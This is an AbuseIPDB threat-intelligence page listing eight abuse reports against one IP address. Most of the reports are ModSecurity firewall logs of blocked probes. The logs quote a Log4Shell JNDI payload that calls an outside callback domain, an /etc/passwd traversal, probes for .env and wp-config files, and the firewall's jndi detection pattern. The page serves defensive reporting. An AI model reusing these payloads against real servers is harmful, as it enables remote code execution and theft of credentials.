JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 45.41.173.37

45.41.173.37 was found in our database!

This IP was reported 8 times. Confidence of Abuse is 4%: ?

ISP	HostRoyale LLC
Usage Type	Data Center/Web Hosting/Transit
ASN	AS46516
Hostname(s)	ip-45-41-173-37.fibre.fibrestream.ca
Domain Name	hostroyale.com
Country	🇺🇸 United States of America
City	Ashburn, Virginia

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 45.41.173.37

Whois 45.41.173.37

IP Abuse Reports for 45.41.173.37:

This IP address has been reported a total of 8 times from 4 distinct sources. 45.41.173.37 was first reported on January 15th 2025, and the most recent report was 4 days ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 ipblock.com	2026-06-01 11:36:00 (4 days ago)	IPBlock protected site ID [4055-d][s=02]. Major crawler impostor. Mozilla/5.0 (compatible; Googleb ... show more IPBlock protected site ID [4055-d][s=02]. Major crawler impostor. Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) show less	Bad Web Bot
🇺🇸 TPI-Abuse	2026-01-27 02:39:29 (4 months ago)	(mod_security) mod_security (id:248270) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream ... show more (mod_security) mod_security (id:248270) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream.ca): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Jan 26 21:39:18.957576 2026] [security2:error] [pid 1914:tid 1924] [client 45.41.173.37:50987] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\$\\\\{jndi:(ldaps?\|rmi\|dns\|iiop\|nis\|nds\|corba\|\\\\$\\\\{(?:lower\|upper)):" at ARGS:x. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j\|\|ftp.kettlehill.net\|F\|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "ftp.kettlehill.net"] [uri "/"] [unique_id "aXglVsPq0E0MroPkyLy4MgAAAAQ"], referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d5s28hpq9s7s7dg7js4gero94rgrobsb5.rsfi.info} show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2026-01-17 07:21:16 (4 months ago)	(mod_security) mod_security (id:210492) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream ... show more (mod_security) mod_security (id:210492) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream.ca): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jan 17 02:21:13.430658 2026] [security2:error] [pid 17465:tid 17465] [client 45.41.173.37:41841] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcalendars.nbcnewsradio.com"] [uri "/wp-config.php.swp"] [unique_id "aWs4aRYnJYTm2MfONNdbDgAAAAE"] show less	Brute-Force Bad Web Bot Web App Attack
🇨🇭 backslash	2026-01-14 21:50:04 (4 months ago)	block ruleset CC531825F9395F9A07FB06C1247C46770A2690F8	Bad Web Bot
🇺🇸 TPI-Abuse	2025-11-13 11:05:07 (6 months ago)	(mod_security) mod_security (id:210730) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream ... show more (mod_security) mod_security (id:210730) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream.ca): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 13 06:05:01.087998 2025] [security2:error] [pid 3945:tid 3945] [client 45.41.173.37:44995] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy\|\|ftp.nbcnewsradio.com\|F\|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "ftp.nbcnewsradio.com"] [uri "/web_cste/cgi-bin/product.ini"] [unique_id "aRW7XeMcF7Gk7PTBvOWW6AAAABQ"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-05-29 18:52:02 (1 year ago)	(mod_security) mod_security (id:210492) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream ... show more (mod_security) mod_security (id:210492) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream.ca): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu May 29 14:48:16.228755 2025] [security2:error] [pid 3174316:tid 3174316] [client 45.41.173.37:36419] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcalendars.farmers123.com"] [uri "/.env.old"] [unique_id "aDir8LT9xxbOHGzUK0PAPQAAADM"] show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 TPI-Abuse	2025-02-27 14:46:06 (1 year ago)	(mod_security) mod_security (id:210580) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream ... show more (mod_security) mod_security (id:210580) triggered by 45.41.173.37 (ip-45-41-173-37.fibre.fibrestream.ca): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Feb 27 09:45:39.349210 2025] [security2:error] [pid 27303:tid 27398] [client 45.41.173.37:54497] [client 45.41.173.37] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:local-destination-id. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt\|\|www.kettlehill.net\|F\|2"] [data "Matched Data: etc/passwd found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.kettlehill.net"] [uri "/wp-admin/admin-post.php"] [unique_id "Z8B6k1qvcS75O-zsMlKdVwAAAU8"] show less	Brute-Force Bad Web Bot Web App Attack
Anonymous	2025-01-15 07:10:57 (1 year ago)	\| Shellshock attack detected	Hacking SQL Injection Web App Attack

Showing 1 to 8 of 8 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇨🇳 223.221.36.42

🇯🇵 203.25.124.47

🇺🇸 185.180.141.13

🇬🇧 31.14.254.38

🇬🇧 217.146.80.104

🇫🇮 216.40.72.77

🇧🇷 205.210.31.178

🇬🇧 193.176.29.6

🇬🇧 193.163.125.49

🇬🇧 193.32.209.228

🇺🇸 172.58.167.178

🇭🇰 154.221.25.205

🇮🇷 109.162.200.248

🇮🇳 103.146.110.226

🇧🇩 103.134.58.187

🇧🇩 103.129.208.143

🇩🇪 87.106.29.151

🇯🇵 18.183.60.20

🇬🇧 5.226.140.23

🇺🇦 176.103.1.102